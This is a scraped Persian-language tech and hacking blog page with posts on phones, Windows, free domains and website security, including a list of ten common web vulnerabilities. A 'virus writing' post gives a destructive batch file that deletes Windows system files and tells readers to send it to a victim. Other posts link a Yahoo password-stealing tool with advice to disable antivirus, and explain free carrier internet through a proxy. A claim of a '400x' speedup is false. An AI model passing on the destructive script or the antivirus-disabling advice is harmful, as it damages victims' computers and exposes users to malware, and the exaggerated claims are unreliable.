» 10 دلیل اصلی هک شدن سایتها

  » 
نويسندگان
آمار و امكانات
تعداد بازديدها:

<-PollName->

<-PollItems->

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز : 1
بازدید دیروز : 0
بازدید هفته : 55
بازدید ماه : 186
بازدید کل : 65186
تعداد مطالب : 31
تعداد نظرات : 28
تعداد آنلاین : 1



زیبا ترین چتروم

طراح قالب

Template By: Trahan.Loxblog.Com


درباره ما
به وبلاگ خودتون خوش اومدید
پيوند هاي روزانه
آرشيو مطالب
لينك دوستان

فال حافظ

قالب های نازترین

جوک و اس ام اس

جدید ترین سایت عکس

زیباترین سایت ایرانی

نازترین عکسهای ایرانی

بهترین سرویس وبلاگ دهی

»  ❤ ❤ آموزش هک ❤ ❤
» تبادل لینک اتوماتیک و رایگان
» b0y ill
» چت روم تفریحی چت چت
» عکاسی لندن
» آندرویید 74
» فقط اگه دلت گرفته بيا !!!
» گوگولی
» همه چیز برای سرگرمی
» عشق
» کیت اگزوز
» زنون قوی
» چراغ لیزری دوچرخه
» همسریابی
» درگاه پرداخت اینترنتی

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان وبلاک طراحان و آدرس trahan.LXB.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.





» 10 دلیل اصلی هک شدن سایتها

هکرها  معمولا از نواقص و عدم رعایت نکات امنیتی توسط طراحان سایتها و برنامه نویسان  جهت نفوذ به سایتها استفاده میکنند  مواردی که با کمی دقت قابل پیش بینی و رفع هستند. در ادامه به برخی از مهمترین نواقص و موارد رایج در هک سایتها در سالهای اخیر اشاره شده است.

1. Cross site scripting  یا  XSS
این مشکل زمانی ایجاد می شود که  اطلاعات ارسالی بین کاربران و سایت بدون بررسی و اعتبار سنجی لازم توسط نرم افزار سایت صورت گیرد. در این حالت هکرها میتوانند اسکریپتهایی را همراه اطلاعات به نرم افزار سایت تزریق کنند و این اسکریپتها هنگام نمایش اطلاعات در مرورگر دیگر  کاربران سایت اجرا شده  و مشکلاتی همچون سرقت اطلاعات نشست (Session) و دسترسی به اختیارات و اطلاعات دیگر کاربران و یا تغییر در صفحات سایت را ایجاد کند.

2.Injection flaws
در این شیوه هکر به همراه بخشی از اطلاعات یا پارامترهای ارسالی به سایت  دستورات غیر مجازی که امکان خواندن،تغییر یا حذف یا درج اطلاعات جدید را فراهم میکند نیز تزریق میکند.یکی از معمول ترین این روشها SQL Injection است که امکان تغییر در  اطلاعات  و جداول بانک اطلاعاتی یا تغییر در درخواستها از بانک اطلاعات (مانند تعیین اعتبار کاربر و کلمه) را امکان پذیر میکند.

3.Malicious file execution
این مسئله به هکر ها اجازه اجرای برنامه یا کدی را میدهد که امکاناتی در تغییرات یا مشاهده اطلاعات یا حتی تحت کنترل گرفتن کل نرم افزار سایت یا سیستم را میدهد. این مشکل در سایتهایی که امکان ارسال فایل را به کاربران بدون بررسی ماهیت اطلاعات را می دهد اتفاق می افتد (مثلا ارسال یک اسکریپ PHP یا ASP به جای فایل تصویری توسط کاربر)

4.Insecure direct object reference
این مشکل عموما در دستکاری پارامترهای ارسالی به صفحات یا اطلاعات فرمهایی هست که بصورت مستقیم به فایل، جداول اطلاعاتی،فهرستها یا اطلاعات کلیدی اتفاق می افتد و  امکان دسترسی  یا تغییر  فایلهای اطلاعاتی دیگر کاربران را ایجاد میکند. (مانند ارسال کد کاربر یا نام فایل مخصوص او بصورت پارامتر در آدرس صفحه که با تغییر آن امکان دسترسی یا تغییر در اطلاعات کاربر دیگری وجود خواهد داشت)

5.Cross site request forgery
در اینگونه حملات هکر کنترل مرورگر قربانی را یدست آورده  و زمانی که وی وارد سایت (login) شده  درخواستهای نادرستی را به سایت ارسال می کند. (نمونه آن چندی پیش دز سایت myspace  اتفاق افتاده بود و هکری با استفاده  از یک کرم اینترنتی پیغامی را در میلیونها صفحه کاربران این سایت نمایش داد)

6.Information leakage and improper error handling
همانطور که از نام این مشکل مشخص است زمانی که در  خطاهای نرم افزار سایت به شکل مناسبی مدیریت نشوند در صفحات خطا اطلاعات مهمی نمایش داده شود که امکان سوء استفاده از آنها وجود داشته باشد.(نمونه ای از همین مشکل چندی پیش برای یکی از سایتهای فارسی نیز بوجود آمد و اطلاعات کاربری و کلمه عبور اتصال به بانک اطلاعات در زمان خطا نمایش داده می شد و باعث سوء استفاده و تغییر اطلاعات کاربران این سایت شد )

7.Broken authentication and session management
این مشکل در زمانی که نشست کاربر (Session) و کوکی اطلاعات مربوط به ورود کاربر به دلایلی به سرقت می رود یا به دلیلی نیمه کاره رها می شود  ایجاد می شود. یکی از شیوه های جلوگیری از این مشکل  رمز نگاری اطلاعات و  استفاده SSL است.

8.Insecure cryptographic storage
این مشکل نیز چنانچه از عنوان آن مشخص است بدلیل اشتباه در رمزنگاری اطلاعات مهم  (استفاده از کلید رمز ساده یا عدم رمز نگاری اطلاعات کلیدی)  است.

9.Insecure communications
ارتباط ناامن نیز مانند مشکل قبلی است با این تفاوت که در لایه ارتباطات شبکه است.هکر در شرایطی میتواند اطلاعات در حال انتقال در شبکه را مشاهده کند و از این طریق به اطلاعات مهم نیز دست پیدا کند. همانند مشکل قبلی نیز استفاده از شیوه های رمزنگاری و SSL راه حل این مشکل است.

10.Failure to restrict URL access
برخی از صفحات سایتها (مانند صفحات بخش مدیریت سایت) می بایست تنها در اختیار کاربرانی با دسترسی خاص باشند.اگر دسترسی به این صفحات و پارارمترهای ارسالی آنها به شکل مناسبی حفاظت نشده باشد ممکن است هکرها آدرس این صفحات را حدس بزنند و  به نحوی به آنها دسترسی پیدا کنند.

»  نوع مطلب : <-PostCategory->
»  نوشته شده در پنج شنبه 27 آذر 1393برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» معذرت میخوام دوستان

سلام

خدارا شکر میکنم که بعد از یک سال یا بیشتر از آن توانستم در این وبلاک مطلبی را بگذارم و از تک تک شما دوستان نهایت گرامی معذرت میخواهم بخاطر غیبت یکساله و یا بیشتر از آن

 

امیدوارم مرا ببخشید

با احترام

»  نوع مطلب : <-PostCategory->
»  نوشته شده در پنج شنبه 27 آذر 1393برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» 
انتخاب پردازنده مناسب یکی از سخت ترین و پیچیده ترین تصمیمات در حین خرید یک کامپیوتر جدید است جائیکه برای هر دو نام بزرگ این رده یعنی اینتل و AMD زیر گروه های متعدد با سوکت های گوناگون و قیمت های کاملا متفاوتی دیده می شود که انتخاب پردازنده مناسب و به طبع آن مادربورد پشتیبانی کننده از آن سوکت را به یکی از دشوارترین انتخاب ها در حین خرید یک سیستم دسک تاپ جدید بدل نموده است. در مقاله پیش رو قصد داریم دو پردازنده پر سر و صدای این روزهای بازار یعنی سری Core i5 و Core i7 از پردازنده های اینتل را با یکدیگر مقایسه کرده و انتخاب از میان این دو مدل را تا اندازه ای آسان نمائیم. با ما همراه شوید.

intel_core_i7_core_i5_01.jpg
 
     
»  نوع مطلب : <-PostCategory->
»  نوشته شده در چهار شنبه 13 دی 1391برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» جدیدترین مدل لپ تاپ های lenovo

لپ تاپ های جدید ‫Y570 و Lenovo Y470 وجوه مشترک زیادی با دیگر کامپیوترها دارند اما نه زمانی که شما برای استفاده از سیستم عجله داشته باشید و بخواهید سریعتر در دسترس قرار گیرند. در چنین حالتی تنها موضوع حائز اهمیت این است که این مدل ها در کمتر از ۱۰ ثانیه بوت می شوند و سیستم عامل ویندوز را آماده کار تقدیمتان می کنند. این شرکت ادعا می کند این لپ تاپ ها سریع ترین سرعت بوت سیستم عامل ویندوز را در اختیار شما قرار میدهد.

»  نوع مطلب : <-PostCategory->
»  نوشته شده در چهار شنبه 13 دی 1391برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» کدوم یکی را بیشتر دوست داری ؟؟؟؟

بعد از رای دادن اینجا نظرتونو بدین در مورد این دو بازی کن

لطفا از حرفهای بی ادبی خودداری نمایید.

 

»  نوع مطلب : <-PostCategory->
»  نوشته شده در سه شنبه 12 دی 1391برچسب:لیونل مسی, کرستیانو رونالدو, کدومو بیشتر دوست داری, توسط محمد اسلام لطفی | لينك ثابت |
» 

سلام دوباره

 

دوستان عزيز چند وقت خيلي سرم شلوغ بود حالا ميخوام يه سايتي رو به شما معرفي كنم كه ميتونيد از اونجا تمام سافت وير هاي گوشش نوكيا N70 رو دانلود كنيد

 

براي ورود به سايت اينجا كليك نماييد

 

نظر يادتون نره

»  نوع مطلب : <-PostCategory->
»  نوشته شده در سه شنبه 9 خرداد 1391برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» وبلاک خود را به صورت رایگان به وبسایت تبدیل نمایید.

با این سایت شما میتونید دومین رایگان کام به دست بیارید

1 عضو شوید در سایت

2 بعد از عضویت شما باید 9 نفر دیگر را معرفی نمایید که عضو شود

3 دومین رایگان .com بگیرید

این سایت به شما یک لینک میده باید 9 نفر دیگه از لینک شما عضو بشن که به شما یک دامنه رایگان کام بده

خیلی راحته پس الان عضو بشین و فعالیت کنید

 

با دادن نظر ما رو همراهی نمایید

»  نوع مطلب : <-PostCategory->
»  نوشته شده در سه شنبه 19 ارديبهشت 1391برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» اطلاعات تکمیلی درباره HTC شگفت انگیز مدل :HTC Droid Incredible

HTC_Incredible

این تلفن هوشمند در حال حاضر تحت قرارداد اپراتور Verizon ارایه خواهد شد. اما می توانید امیدوار باشید که نسخه های آنلاک شده آن را هم به زودی برای فروش در بازار پیدا کنید. اینجا با یک تلفن واقعا قدرتمند طرف هستیم پردازشگر یک گیگاهرتزی آن و ROM 748MB آن نشان می دهد که هنگام کار کردن با سرعت فوق العاده ای روبرو هستید. ضمن اینکه ۸ گیگابایت حافظه داخلی هم فراموش نشده است. ‏

‏ لطفا به ادامه مطلب مراجعه فرمایید...


»  نوع مطلب : <-PostCategory->
»  نوشته شده در دو شنبه 11 ارديبهشت 1391برچسب:موبایل,, توسط محمد اسلام لطفی | لينك ثابت |
» لو رفتن تصاویر نوکیا N5
115453_nokian52

زمانی که نوکیا گوشی های N9 و به تازگی Sea Ray را عرضه کرد ، بسیاری از ما فکر میکردیم که نوکیا به تولید گوشی های هوشمند با امکانات بالا ادامه خواهد داد. به تازگی نیز نوکیا در حال طراحی گوشی N5 است که بر پایه سیمبین آنا Symbian Anna   میباشد که در قسمت گوشی های سطح بالا جای میگیرد.
با اینکه منابع آگاه اظهار داشته اند که این گوشی از سیستم آنا بهره خواهد برد ، ولی تصاویر بیشتر ما را به یاد سیستم عامل می گو ( Meego ) می اندازد.

لطفا به ادامه مطلب مراجعه فرمایید


»  نوع مطلب : <-PostCategory->
»  نوشته شده در دو شنبه 11 ارديبهشت 1391برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» آندروید فون یاهو

115735_yahoo-androidcopy

سومین اپراتور بزرگ موبایل ژاپن -SoftBank - اخیرا در مورد موبایل جدید یاهو که به سیستم عامل آندروید نیز مجهز خواهد بود خبری منتشر کرده است.

 

لطفا به ادامه مطلب مراجعه فرمایید...

»  نوع مطلب : <-PostCategory->
»  نوشته شده در دو شنبه 11 ارديبهشت 1391برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» معرفی گوشی 12 مگاپیکسلی یعنی نوکیا N8

12MP-Nokia

شرکت نوکیا به تاریخ 7 اردیبهشت ماه 89 اقدام به معرفی گوشی 12 مگاپیکسلی یعنی N8 کرد . این گوشی دومین گوشی نوکیا ویژه شبکه های مجازی اجتماعی است . نام این گوشی جدید N8 است و برای مشاهده اطلاعات بیشتر درباره این گوشی می توانید به ادامه همین مطلب از ای تی کده مراجعه کنید ...

 

لطفا به ادامه مطلب مراجعه فرمایید...

»  نوع مطلب : <-PostCategory->
»  نوشته شده در دو شنبه 11 ارديبهشت 1391برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» آیا درباره تاریخچه موبایل چیزی میدانید؟

recyclephones3

خیلی از ما انسان های هر روزه از وسیله ای به نام تلفن همراه یا موبایل استفاده های بسیار زیاد و مختلفی میکنیم . هر روز برای امور مختلف از این وسیله استفاده می کنیم . اما آیا تا بحال از خود پرسیده اید که این وسیله کی اختراع شد؟ تاریخچه ی آن چست ؟ شکل ابتدایی آن کدام است ؟ و …

لطفا به ادامه مطلب مراجعه فرمایید...


»  نوع مطلب : <-PostCategory->
»  نوشته شده در دو شنبه 11 ارديبهشت 1391برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» روش دیگر برای هک نمودن ای دی یاهو بدون نیاز به نرم افزار!!!

برای این کار باید از مرورگر اینترنت اکسپورر استفاده کنید و حتما آیدی یاهو داشته باشید.

مراحل انجام کار :

۱- به یاهو می رید و یوزر و پسورد رو وارد می کنید و به بخشی می روید که می شود از آن ایمیل فرستاد.

۲- در قسمت نشانی می نویسید :


لطفا به ادامه مطلب مراجعه فرمایید...

»  نوع مطلب : <-PostCategory->
»  نوشته شده در دو شنبه 11 ارديبهشت 1391برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» چه کسی کامپیوتر را اختراع کرد در چه زمانی ؟

چه کسی کامپیوتر را اختراع کرد در چه زمانی ؟

رایانه یا کامپیوتر ماشینی است که برای پردازش اطلاعات استفاده می‌شود. ورود این ماشین به ایران در اوائل دهه ۱۳۴۰ بود که به آن کامپیوتر می‌گفتند .واژه رایانه در دو دهه اخیر رایج شده و به‌تدریج جای کامپیوتر را گرفت.

 

لطفا به ادامه مطلب مراجعه فرمایید

 

»  نوع مطلب : <-PostCategory->
»  نوشته شده در شنبه 9 ارديبهشت 1391برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» بالا بردن سرعت کامپیوتر

بنا به درخواست شما دوستان عزیز این ترفند رو گذاشتم که همه نهایت استفاده

رو ازش ببرند

در این ترفند قصد داریم که به شما یاد بدیم که چگونه سرعت کامپیوتر خود را 400برابر کنید

ترفندهای100%عملی بوده وجواب میدهد قبلا تست شده است

برای این کار ابتدا واردstartشده وگزینه run راانتخاب می کنیم

 

 

لطفا به ادامه مطلب مراجعه فرمایید...

 

»  نوع مطلب : <-PostCategory->
»  نوشته شده در پنج شنبه 7 ارديبهشت 1391برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» Windows 7

ویندوز ۷ (به انگلیسی: Windows 7) (پیشتر با اسم رمز Vienna و Blackcomb) آخرین نسخه سیستم‌عامل از سری مایکروسافت ویندوز است که در تاریخ ۲۲ اکتبر سال ۲۰۰۹ به بازار عرضه شد. ویندوز ۷ برای استفاده در کامپیوترهای شخصی شامل انواع خانگی و اداری تولید شده است. این سیستم‌عامل هفتمین نسل از سیستم‌عامل‌های ویندوز می‌باشد و به همین دلیل نام آن را ویندوز ۷ گذاشته‌اند.


لطفا به ادامه مطلب مراجعه فرمایید...

»  نوع مطلب : <-PostCategory->
»  نوشته شده در پنج شنبه 7 ارديبهشت 1391برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» با گوشیتون چقد صحبت کردین+ چند بار تعمیرشده؟

 


 

با گوشیتون چقد صحبت کردین+ چند بار تعمیرشده؟

با گوشیتون چقد صحبت کردین+ چند بار تعمیرشده؟

با این کد میتونین چند تا اطلاع در مورد گوشی بدست بیارین

البته این کد برای نوکیاست

1.شماره سریال گوشی
2.تاریخ دقیق ساخت
3.تاریخ خرید
4.تعداد دفعات تعمیر
5.مدت زمانی که باهاش صحبت کردیم

#92702689#*

»  نوع مطلب : <-PostCategory->
»  نوشته شده در چهار شنبه 6 ارديبهشت 1391برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» کد طلایی

این کدهای طلایی

تقریبا تمام اپراتورهای تلفن همراه در جهان کدهای ویژه ای دارند که به واسطه بکارگیری این کدها کاربران می توانند میزان کارایی گوشی تلفن همراه خود را بالا برده و بر برخی از قابلیت های آن بیافزایند. برخی از این کدها در حقیقت فرامینی هستند که به صورت عادی در منوی گوشی تلفن همراه موجود است و استفاده از این کدها در حقیقت به نوعی میان بر برای همان فرامین محسوب می شود.

 

لطفا به ادامه مطلب مراجعه فرمایید..

»  نوع مطلب : <-PostCategory->
»  نوشته شده در چهار شنبه 6 ارديبهشت 1391برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» چجوری گوشی تلفن همراه رو 119 یا 118 یا 110 یا ... دایورت (Divert) کنیم؟

چجوری گوشی تلفن همراه رو 119 یا 118 یا 110 یا ... دایورت (Divert) کنیم؟

چجوری گوشی تلفن همراه رو 119 یا 118 یا 110 یا ... دایورت (Divert) کنیم؟

حتما تاحالا شده که خواستین امتحان کنید ببینید گوشیتونو میتونید رو شماره هایی مثل 119 یا 118 یا 110 یا ... دایورت کنید یا نه؟ ولی بعدش فهمیدین که بعد از دایورت کردن وقتی بهتون زنگ میزنن به جایی که ساعت رو اعلام کنه یا بگه اپراتور شماره فلان! میگه شماره مورد نظر شما مسدود میباشد یا میگه شماره مشترک موردنظر در شبکه موجود نمیباشد یا از این جور چرت و پرتا! ولی من اینجا این کار رو بهتون یاد میدم تا آدمای مزاحم رو از خودتون دور کنید!!

اما چجوری باید این کار رو بکنیم؟

 

لطفا به ادامه مطلب مراجعه فرمایید...

 

»  نوع مطلب : <-PostCategory->
»  نوشته شده در چهار شنبه 6 ارديبهشت 1391برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» نرم‌افزار مخرب روی گوشی‌های LG

نرم‌افزار مخرب روی گوشی‌های LG

به نقل از تالیانیوز ، شرکت LG از وجود رمز خاصی روی گوشی‌های خود با نام LG Rumors که از سوی شرکت Sprint وارد بازار شده است خبر داد.
این کد امکان ویرایش منوی اصلی گوشی را برای کاربران فراهم می‌کند. کاربران با استفاده از این کد قادرند امکانات مورد نظر خود را در منوی گوشی حذف و یا اضافه کنند. همچنین این کد خاص کاربران را قادر می‌سازد تا تمام اطلاعات و نرم‌افزارهای درونی گوشی را پاک کنند.

              
مسؤولان و مهندسان شرکت LG اعلام کرده‌اند که در نظر دارند تا نسخه به‌روز شده‌ای از نرم‌افزار گوشی‌های خود را به مشترکان عرضه کنند تا کاربران بتوانند از این طریق، امکان دسترسی به بخش تغییرات منو را از گوشی خود حذف کنند.
شرکت
LG قصد دارد با همکاری شرکت مخابراتی Sprint، نسخه به‌روز شده نرم‌افزار خود را به مشترکان عرضه کند. این نسخه قرار است به صورت رایگان در اختیار کاربران قرار بگیرد.
به گفته کارشناسان، یکی از مشکلات اصلی کاربران گوشی‌های
Rumors که از نرم‌افزار مشکل‌دار LG استفاده می‌کنند این است که این کاربران با اتصال به اینترنتی ممکن است از سوی سایر مشترکان مورد حمله قرار بگیرند و هکرها با نفوذ به این گوشی، می‌توانند تمام اطلاعات کاربران را حذف کنند.

»  نوع مطلب : <-PostCategory->
»  نوشته شده در چهار شنبه 6 ارديبهشت 1391برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» آموزش نصب ویندوز

در صورتی که می خواهید نصب ویندوز ایکس پی را یادبگیرید این آموزش به شما کمک زیادی میتواند بکند. ابتدا رایانه را روشن کنید و سی دی ویندوز XP را در داخل آن بگذارید. پیغامهای اولیه سیستم مبنی بر آزمایش حافظه و ... نمایش داده میشود. 

 

 

لطفا به ادامه مطلب مراجعه فرمایید...

 

»  نوع مطلب : <-PostCategory->
»  نوشته شده در چهار شنبه 6 ارديبهشت 1391برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» معرفي اوپرا نسخه گوشي

 

یکی از معروف ترین و پرسرعت ترین مرورگرهای وب Opera می باشد. این شرکت نسخه موبایل این نرم افزار را منتشر کرده است.


از ویژگی های کلیدی برنامه می توان به نکات زیر اشاره کرد:- افزایش سرعت بارگذاری صفحه ها تا 50% نسبت به ورژن قبلی
- پشتیبانی از زوم و قابلیت panning pages
- فشردگی صفحه ها وب تا 70% برای کاهش ترافیک
- پشتیبانی از قابلیت ایجاد New tab
- قابلیت اضافه کردن صفحه های وب به علاقه مندی ها
- ذخیره صفحه های وب و قابلیت مشاهده صفحه ها به صورت آفلاین
- قابلیت auto completion برای تسریع در وارد نمودن آدرس سایت
- پشتیبانی کامل از گوشی های با صفحه لمسی
- قابلیت به روز رسانی
- و ...

 

 

 

 

 

»  نوع مطلب : <-PostCategory->
»  نوشته شده در یک شنبه 15 آبان 1390برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» هك اي دي ياهو

توجه !!!

هر گونه استفاده ی نادرست از مطلب بر عهده ی خودتان می باشد.

نکته!

شاید آنتی ویروس شما اخطار دهد <اصلا نگران نباشید زیرا دلیل این اخطار این است که می گوید پورت ۲۵ شما می خواهد باز شود تا پسورد را بگیرد برای راحتی کار آنتی ویروس خود را <خاموش> کنید>

این هم لینک دانلود!!!

http://www.megaupload.com/?d=BBNTC9WI

 

با دادن نظر ما رو همراهي نماييد

»  نوع مطلب : <-PostCategory->
»  نوشته شده در یک شنبه 15 آبان 1390برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» استفاده رايگان از انترنت ايرانسل

سلام امروز يه آموزش در مورد استفاده رايگان از انترنت ايرانسل رو بهتون ميخوام بدم اميدوارم بدردتون بخوره

اول یک کانکشن بسازید. اسم آن مهم نیست اما باید access point name را mtnirancell و hompage را
http://vitrin.irancell.ir بگزارید و در option گزینه advanced setting را انتخاب و در قسمت پروکسی ۲۰۸٫۸۵٫۲۴۲٫۲۲۱ و پورت ۸۰ را قرار دهید.حالا از داخل مرورگر خود سایت http://vitrin.irancell.ir را باز نمایید و در داخل سایت باز شده گذینه cgiproxy را انتخاب و آدرس مورد نظر را وارد نمایید.
با این روش شما میتوانید در داخل مرور گر خود به صورت مجانی دانلود و وبگردی نمایید.
برای چت کردن نیز میتوانید به سایت Web and Mobile Messenger for MSN, Yahoo, ICQ, AIM, Google Talk, Facebook | eBuddy مراجعه کنید.
 
با دادن نظر ما رو همراهي نماييد
»  نوع مطلب : <-PostCategory->
»  نوشته شده در یک شنبه 15 آبان 1390برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» آموزش ویروس نویسی

سلام دوستان امروز با يه آموزش بسيار خفن اومدم

اين ويروس قابليتي که داره اينه که هيچ آنتي ويروسي نمي تونه در برابرش کاري کنه و بعد از ري استارت ويندوز فرمت ميشه

براي ساختن اين ويروس مراحل زير رو انجام بديد

به نوت پد رفته و اين عبارت رو بنويسيد

del autotexec.bat
del config.sys
cd winnt
del system.ini
del win.ini
بعد اونو با فرمت bat  سيو کنين و براي قرباني بفرستين.

 

 این مطلب فقط بخاطر آموزش گذاشته شده مدیریت وبلاک مسیولیت ندارد

با نظر دادن ما رو همراهی نمایید

»  نوع مطلب : <-PostCategory->
»  نوشته شده در دو شنبه 9 آبان 1390برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» جلوگیری از هک شدن و جلو گیری از نصب ابزارهای جاسوسی

 

 جلوگیری از هک شدن و جلو گیری از نصب ابزارهای جاسوسی و نرم افزار

 ایا تا به حال شده کسی شده تو خونتون بخاد بدونه شما با چه کسانی چت می کنید و بخاد از کار شما سر در بیاره  شاید اتفاق افتاده باشه و شما هم حسابی کلافه می شید و نمی دونید چی کار کنید

 

برای خواندن کامل این مطلب به ادامه مطلب مراجعه نمایید

 

»  نوع مطلب : <-PostCategory->
»  نوشته شده در شنبه 7 آبان 1390برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» دومین رایگان========= .com - .orq - .net

با این سایت شما میتونید دومین رایگان کام به دست بیارید

1 عضو شوید در سایت

2 بعد از عضویت شما باید 9 نفر دیگر را معرفی نمایید که عضو شود

3 دومین رایگان .com بگیرید

این سایت به شما یک لینک میده باید 9 نفر دیگه از لینک شما عضو بشن که به شما یک دامنه رایگان کام بده

خیلی راحته پس الان عضو بشین و فعالیت کنید

 

با دادن نظر ما رو همراهی نمایید

»  نوع مطلب : <-PostCategory->
»  نوشته شده در شنبه 7 آبان 1390برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» دانلود اسکرپت رایگان

سلامممممممممممممممم

امروز میخوام یه سایتی دیگری به شما معرفی کنم که هر چقدر اسکرپت برای ساختن سایت میخواین براتون گذاشته و میتونید رایگان دانلودش کنید برای رفتن به سایت کلیک کنید ...

 

با دادن نظر ما رو همراهی نمایید

»  نوع مطلب : <-PostCategory->
»  نوشته شده در شنبه 7 آبان 1390برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» دومین رایگان

سلامممممممممممممممم

امروز میخوام یک سایت دیگری رو به شما معرفی کنم که دومین رایگان میده قبلا به شما گفتم که داشتن سایت مخصوص در انترنت ضروری میباشد برای گرفتن دومین رایگان کلیک نمایید...

 

با دادن نظر ما رو همراهی نمایید

»  نوع مطلب : <-PostCategory->
»  نوشته شده در شنبه 7 آبان 1390برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» هاست رایگان با دومین رایگان

سلاممممممممممممممممممم

امروز میخوام یه سایتی رو به شما معرفی کنم که هاست رایگان میده به کاربراش شما خودتون بهتر میدونید که داشتن یک سایت اختصاصی در دنیا انترنت ضروری میباشد با این هاست شما حتا میتونید چت روم هم بزنید و این سایت خوبی دیگری هم داره که یک دومین رایگان نیز برای کاربراش میده اگر میخواهید صاحب یک سایت خصوصی با هاست رایگان شوید پس  کلیک نمایید ...

با دادن نظر ما رو همراهی نمایید

»  نوع مطلب : <-PostCategory->
»  نوشته شده در شنبه 7 آبان 1390برچسب:, توسط محمد اسلام لطفی | لينك ثابت |
» به دنیای دانستنیهای کامپیوتر.موبایل و انترنت خوش آمدید

با سلام.به دنیای طراحان خوش آمدید 

هر چقدر مطلب در باره هر چیز که خواسته باشید بهتون میدم شما در باره هر مطلبی که لازم داشته باشید فقط در قسمت نظرات بنویسید و منم به زودترین وقت اون مطلب رو در اختیار تون قرار میدم ....

 

با دادن نظر ما رو همراهی نمایید...

 

اطلاعیه جدید از طراحان:

معرفی بهترین سایتهای انترنتی و دانلود سنتر های خوب و اخبار در باره تکنالوژی و دنیای کامپیوتر، موبایل و انترنت به زودی در طراحان اضافه خواهد شد

نوت: ادرس این سایتها فقط مخصوص اعضا وبلاک میباشد پس زودتر عضو بشید

برای عضویت در وبلاک اینجا کلید نمایید

درسهای ساخت ویروس، هک حرفه ای، وبسایت سازی شروع شد با عضویت در خبرنامه هر شب یک درس به شما ارسال خواهد شد پس زودتر در خبرنامه خود را ثبت نام نمایید

 

ای دی مدیریت وبلاک اگه کاری داشتین اد کنید

mohd_islam20008@yahoo.com

 

یک اطلاعیه جدید از طراحان :

هر کسی که میخواد یک وبلاک شخصی داشته باشه و نمیتونه طراحی کنه طراحان این سهولت را براش ایجاد میکنه فقط با عضویت در وبلاک طراحان و گذاشتن نظر تو این قسمت در ظرف 24 ساعت طراحان هر جور وبلاکی که بخواین براتون طراحی میکنه

این پیشکش برای مدت محدودی میباشد

 

با احترام فراوان

محمد اسلام لطفی

مدیر کل وبلاک طراحان

صفحه قبل 1 2 3 4 صفحه بعد

» عناوين آخرين مطالب ارسالي
Image and video hosting by TinyPic